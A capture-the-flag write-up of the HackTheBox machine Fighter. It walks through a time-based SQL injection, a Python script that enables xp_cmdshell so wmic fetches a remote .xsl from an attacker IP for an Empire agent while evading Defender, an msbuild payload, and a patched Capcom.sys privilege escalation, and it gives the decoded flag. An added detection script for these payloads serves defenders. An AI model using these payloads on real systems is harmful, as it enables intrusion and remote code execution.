Manuel López Pérez · writeups · 3 min read

WriteUp - Fighter (HackTheBox)

Write-up of Fighter (HackTheBox): medium-level Windows machine that exploits a time-based SQLi to extract credentials, gets RCE via xp_cmdshell + msbuild NPS payload, and escalates to SYSTEM with Capcom.sys (CVE-2019-7253) + bypass of checks.

In this post we will solve the machine Fighter from HackTheBox. It is a fairly complicated Windows machine, but a very interesting one for learning new ways to get a shell on Windows. I solved this machine together with some members of my HTB team, and without them this write-up would not have been possible. My nick on HackTheBox is manulqwerty. If you have any suggestion or correction, do not hesitate to leave a comment.

Write-Up

Enumeration

As always, the first thing to do is a scan of all the ports with nmap:

nmap -sC -sV 10.10.10.72

We only have port 80, so let's take a look at the web. As we read in the important announcement, a new website is being developed but the old one is still working; we also learn the domain streetfighterclub.htb, so we are going to look for the old portal. After several tests we find the subdomain members.streetfighterclub.htb. To make it resolve we must add it to /etc/hosts:

10.10.10.72 members.streetfighterclub.htb

Fuzzing, we find http://members.streetfighterclub.htb/old/login.asp. Let's check whether there is SQLi. We capture the request with BurpSuite and use the Active Scan. After the Active Scan we detect a time-based SQLi in the logintype parameter. Being time-based, every sqlmap run takes a lot of time; as an example, this is how the databases would be obtained:

sqlmap -r request.txt --dbms=mssql --technique=B --level 5 --risk 3 -p logintype --dbs --threads=1 --time-sec=1 --batch --flush-session

After a good while extracting data from the database, we realize that there is nothing usable to obtain credentials. We will try to get RCE through the SQLi, following: https://www.tarlogic.com/blog/red-team-tales-0x01/

Exploitation

After hours trying to get this method to work without success, we found the key to bypass Defender: starfighter_xsl from [Empire by Luis Vacas](https://github.com/Hackplayers/Empire-mod-Hackplayers) (which, by the way, I recommend you use: it has very interesting additional modules). For this we are going to write a small Python script that makes the target run our .xsl and gives us an Empire agent:

from requests import post

# Stacked-query payload in the vulnerable logintype parameter: enables
# xp_cmdshell (spelled in mixed case, as in the original payload), runs
# wmic with the remote .xsl stylesheet, then disables xp_cmdshell again
params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.7:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}

# Send it to verify.asp with the session cookie captured in Burp
resp = post("http://members.streetfighterclub.htb/old/verify.asp", data=params, allow_redirects=False, cookies={"ASPSESSIONIDCQQARTCC":"OJGJBAHDGMPKEHOFHCKLKDIG"})
print(resp.status_code)
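From the defender's side, the two request shapes seen in this section (the time-based probe found by the Active Scan and the stacked xp_cmdshell chain sent to verify.asp) are easy to spot in web-server or WAF logs once the parameter values are URL-decoded and case-folded. The script below is an added example written for this write-up, not the author's code or any tool from the post; the request bodies it scans are constructed samples, not captured traffic, and the pattern names, scores and severity labels are my own choices.

```python
"""Flag MSSQL stacked-query / xp_cmdshell abuse in form-encoded POST bodies."""
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample request bodies (not captured traffic): a benign login,
# a time-based probe against logintype, and a case-mangled xp_cmdshell chain
# of the same shape as the one used in the write-up.
SAMPLE_BODIES = [
    ("req-1", "username=admin&password=admin&B1=LogIn&logintype=1"),
    ("req-2", "username=admin&password=x&B1=LogIn"
              "&logintype=1%3BWAITFOR+DELAY+%270%3A0%3A5%27--"),
    ("req-3", "username=a&password=b&B1=LogIn"
              "&logintype=1%3BEXEC+sp_configure+%27xP_cmDshEll%27%2C+1"
              "%3BRECONFIGURE+WITH+OVERRIDE"
              "%3Binsert+into+t+execute+xp_CmdSheLl+%27whoami%27"),
]

# Patterns run against the normalised (decoded, lower-cased) value, so
# mixed-case spellings such as xP_cmDshEll match like the canonical form.
PATTERNS = {
    "time_based_probe":   re.compile(r"\bwaitfor\s+delay\b"),
    "stacked_query":      re.compile(
        r";\s*(?:exec|execute|reconfigure|insert|create|drop|declare)\b"),
    "xp_cmdshell_enable": re.compile(r"sp_configure\s*'\s*xp_cmdshell\s*'\s*,\s*1\b"),
    "xp_cmdshell_exec":   re.compile(r"\bxp_cmdshell\b"),
}
# Hypothetical scoring: enabling or calling xp_cmdshell outranks a generic
# stacked query, which outranks a lone timing probe.
SCORE = {"xp_cmdshell_enable": 3, "xp_cmdshell_exec": 3,
         "stacked_query": 2, "time_based_probe": 1}
LABEL = {3: "critical", 2: "high", 1: "medium"}


def normalize(value: str, max_rounds: int = 3) -> str:
    """Undo repeated URL-encoding (catches %2527-style double encoding),
    collapse whitespace and lower-case the value before matching."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).strip().lower()


def scan_body(body: str) -> dict:
    """Return {parameter: [finding names]} for every parameter that matched."""
    findings = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:
            text = normalize(raw)
            hits = [name for name, rx in PATTERNS.items() if rx.search(text)]
            if hits:
                findings.setdefault(param, []).extend(hits)
    return findings


def scan_requests(requests):
    """Scan (request_id, body) pairs; return only flagged ones, worst first."""
    results = []
    for req_id, body in requests:
        findings = scan_body(body)
        score = max((SCORE[n] for hits in findings.values() for n in hits), default=0)
        if score:
            results.append({"id": req_id, "score": score,
                            "severity": LABEL[score], "findings": findings})
    results.sort(key=lambda r: -r["score"])
    return results


if __name__ == "__main__":
    for r in scan_requests(SAMPLE_BODIES):
        print(f'{r["id"]}: {r["severity"]} {r["findings"]}')
```

Feeding real IIS or reverse-proxy logs into scan_requests only requires reconstructing the POST body per request; the normalisation step is what matters, because the payload in this write-up relies on case mangling and a WAF that compares raw bytes would miss it.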

Let's migrate the Empire agent to Metasploit with nps_payload: https://github.com/trustedsec/nps_payload (example of use):

cd C:\\Users\\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe msbuild_nps.xml

Post-Exploitation

Reviewing the files in the C:\Windows directory, I noticed the file capcom.sys, and with a simple search I saw that it could be useful to escalate to SYSTEM. At first the exploit does not work for us: after reading its code we see that we need an x64 session, so we use the module windows/local/payload_inject to get one. Then we edit the exploit code so that it does not perform the verifications, commenting out the function check_result. Let's reload it and it works:

edit
reload

We are already SYSTEM but this is not over yet: we have a small reversing challenge. Opening the files with IDA Pro we see that if the function check() returns 1 it gives us the flag. The function check() XORs each character of the variable aFmFeholH with 9. To reverse this I wrote a small program in C, even though the simplest thing would be patching the binary:

#include <stdio.h>
#include <string.h>

int main(void) {
    /* Obfuscated string taken from the binary (IDA name: aFmFeholH) */
    char aFmFeholH[] = "Fm`fEhOl}h";
    size_t i;

    /* Undo the single-byte XOR with 9 that check() applies, one char at a time */
    for (i = 0; i < strlen(aFmFeholH); i++)
        printf("%c", (unsigned char)aFmFeholH[i] ^ 9);
    puts("");
    return 0;
}

OdioLaFeta
